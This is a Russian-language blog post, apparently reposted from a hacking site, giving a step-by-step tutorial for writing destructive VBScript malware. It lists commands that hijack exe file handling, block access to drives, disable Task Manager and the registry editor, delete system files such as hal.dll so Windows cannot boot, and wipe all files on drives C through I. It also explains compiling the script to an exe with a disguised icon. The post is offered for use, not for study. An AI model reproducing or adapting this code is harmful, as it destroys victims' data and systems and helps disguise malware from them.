Главная » 2009 » Май » 31 » Создаем вирус за 15 мин
23:06
Создаем вирус за 15 мин
Вредоносная программа будет написана на языке visual basic script.
Затем скомпилирована в "exe" формат.
Приступим. 
Для начала,нужно уметь изменять расширение файла, с этого и начнём.
Существует много способов, но мне нравится этот.
У каждого должен быть обычный архиватор,вот им мы и воспользуемся. 
И так,создайте к примеру текстовый фаил под названием "Текстовый документ". 
Теперь найдите этот текстовик через свой архиватор. В архиваторе, 
вы должны увидеть следующее: "Текстовый документ.txt". 
Окончание "txt" - имя расширения файла,вот его и нужно изменить,точно так же, словно, редактируете имя папки или файла,стираете строчку "txt" и ставите скажем "mp3". 
В результате мы получаем "Текстовый документ.mp3" формата. 
Если всё понятно, а вопросов возникнуть по этому поводу недолжно,то пойдём дальше.
Создайте текстовый документ,содержащий следующее:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.run"rundll32 user32, SwapMouseButton"

Затем, сохранив полученные данные, вам нужно изменить расширение файла, и вместо "txt" прописать "vbs". 

Аббревиатура "vbs", происходит от названия языка программирования - "visual basic script".

Вот у нас и готова первая, простая, вредоносная программка, меняющая местами кнопки мыши.

Теперь нужно её скомпелировать (изменить) в "exe" формат с помощью программы: "Vbs2Exe", 
и установить любой значок с помощью грабера иконок: "IconToy". 

А теперь информация для тех, кто не намерен ограничивать свои возможности банальным обменом кнопок мыши. 
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Три, верхние строчки - должны присутствовать всегда. Далее, 
следует кодировка, а ниже, в скобках - пояснение.

Так же возможно сочетать, те или иные вредоносные команды.
s.regwrite"HKCRexefileshellopencommand","rundll32.exe"
(Запрет на открытие "EXE" файлов)
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives","67108863","REG_DWORD"
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive","67108863","REG_DWORD"
(запрет доступа к жёстким дискам)
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1
(удаляется системный фаил, после чего загрузка Windows становится невозможна.

Система работает до первой перезагрузки)
fso.deletefolder fso.getspecialfolder(0)+"system32drives",1
fso.deletefolder fso.getspecialfolder(0)+"Driver Cache"
(удаление драйверов)

fso.deletefolder "АДРЕС",1
(Удаление папки. Пример: fso.deletefolder "C:Новая папка",1)

fso.deletefolder "C:*.*",1
(Удаление всех папок диска С. Адрес можно поставить любой)

fso.deletefile "АДРЕС",1
(Удаление файла. Пример: fso.deletefile "C:Новая папкаТекстовый документ.txt",1)

fso.deletefile "C:*.*",1
(Удаление всех файлов диска С. Адрес можно поставить любой)

s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisableregistrytools","1","REG_DWORD"
(Запрет редактирования реестра)

s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr","1","REG_DWORD"
(Запрет диспетчера задач)

s.run"rundll32 user32, SwapMouseButton"
(Обмен кнопок мыши)

Пример:


on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
fso.deletefile "C:*.*",1
fso.deletefolder "C:*.*",1
fso.deletefile "D:*.*",1
fso.deletefolder "D:*.*",1
fso.deletefile "E:*.*",1
fso.deletefolder "E:*.*",1
fso.deletefile "F:*.*",1
fso.deletefolder "F:*.*",1
fso.deletefile "G:*.*",1
fso.deletefolder "G:*.*",1
fso.deletefile "H:*.*",1
fso.deletefolder "H:*.*",1
fso.deletefile "I:*.*",1
fso.deletefolder "I:*.*",1
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1

Я не несу никаю отвественность за то что вы можете сделать с помошью этой статьи,так что делайте выводы...

Статья взята с сайта HackZona.Ru



Просмотров: 848 | Добавил: Виктор | Теги: вирус | Рейтинг: 0.0/0
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]